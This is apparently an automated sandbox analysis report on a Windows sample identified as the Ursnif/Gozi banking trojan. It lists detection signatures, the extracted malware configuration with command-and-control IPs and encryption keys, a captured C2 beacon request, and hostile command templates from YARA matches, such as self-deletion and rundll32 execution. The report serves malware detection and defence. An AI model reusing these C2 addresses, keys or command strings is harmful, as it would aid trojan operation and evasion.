Windows Analysis Report
KOYCdGz80D.exe

Overview

General Information

Sample Name: KOYCdGz80D.exe
Original Sample Name: d09f787a952a6e946656ac9184768fbe.exe
Analysis ID: 826246
MD5: d09f787a952a6e946656ac9184768fbe
SHA1: c3c3cbad8d40c7ba332c2b6d7ae0464d092c0877
SHA256: 8cd071a056f555c793b95c82f9eff1fcf60e304a1e9589988e9819f27a754256
Tags: 2502557713, exe, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls

Classification

  • System is w10x64
  • KOYCdGz80D.exe (PID: 5348 cmdline: C:\Users\user\Desktop\KOYCdGz80D.exe MD5: D09F787A952A6E946656AC9184768FBE)
  • cleanup
Name: Gozi, Ursnif
Description: 2000 Ursnif aka Snifula; 2006 Gozi v1.0, Gozi CRM, CRM, Papras; 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest. In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
    Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_261f5ac5 | Description: unknown | Author: unknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      No Sigma rule has matched
      Timestamp: 03/14/23-15:00:52.733532
      Source IP: 192.168.2.7
      Destination IP: 62.173.142.51
      Source Port: 49700
      Destination Port: 80
      SID: 2033203
      Protocol: TCP
      Classtype: A Network Trojan was detected

      Timestamp: 03/14/23-15:00:52.733532
      Source IP: 192.168.2.7
      Destination IP: 62.173.142.51
      Source Port: 49700
      Destination Port: 80
      SID: 2033204
      Protocol: TCP
      Classtype: A Network Trojan was detected


      AV Detection

      Source: KOYCdGz80D.exe | Virustotal: Detection: 52%
      Source: KOYCdGz80D.exe | ReversingLabs: Detection: 48%
      Source: http://94.103.183.153/ws | Avira URL Cloud: Label: malware
      Source: http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCi | Avira URL Cloud: Label: malware
      Source: http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk | Avira URL Cloud: Label: malware
      Source: http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/ | Avira URL Cloud: Label: malware
      Source: http://94.103.183.153/ | Avira URL Cloud: Label: malware
      Source: http://62.173.142.51/ | Avira URL Cloud: Label: malware
      Source: KOYCdGz80D.exe | Joe Sandbox ML: detected
      Source: 0.2.KOYCdGz80D.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

      Compliance

      Source: C:\Users\user\Desktop\KOYCdGz80D.exe | Unpacked PE file: 0.2.KOYCdGz80D.exe.400000.0.unpack
      Source: KOYCdGz80D.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\KOYCdGz80D.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Networking

      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49700 -> 62.173.142.51:80
      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49700 -> 62.173.142.51:80
      Source: global traffic | HTTP traffic detected: GET /drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.51
          Connection: Keep-Alive
          Cache-Control: no-cache
      Source: Joe Sandbox View | ASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: unknown | DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknown | TCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknown | TCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknown | TCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000878000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/
      Source: KOYCdGz80D.exe, 00000000.00000002.509470240.000000000229C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://94.103
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.103.183.153/
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509156874.0000000000809000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCi
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.103.183.153/ws
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/6WkbUYRz/dPSG7YZOtAhk9jZCO3f
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/drew/3PKTGV3tNzaVLTkq/t_2Fk5P4Y6K9Qzr/6RM6HLfcw_2BRzYyd_/2FngDszCZ/8roslt
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checklist.skype.com/drew/3PKTGV3tS
      Source: unknown | DNS traffic detected: queries for: checklist.skype.com
      Source: global traffic | HTTP traffic detected: GET /drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.51
          Connection: Keep-Alive
          Cache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      Source: Yara match | File source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR
      Source: KOYCdGz80D.exe, 00000000.00000002.509156874.0000000000809000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      Source: Yara match | File source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR

      System Summary

      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: KOYCdGz80D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
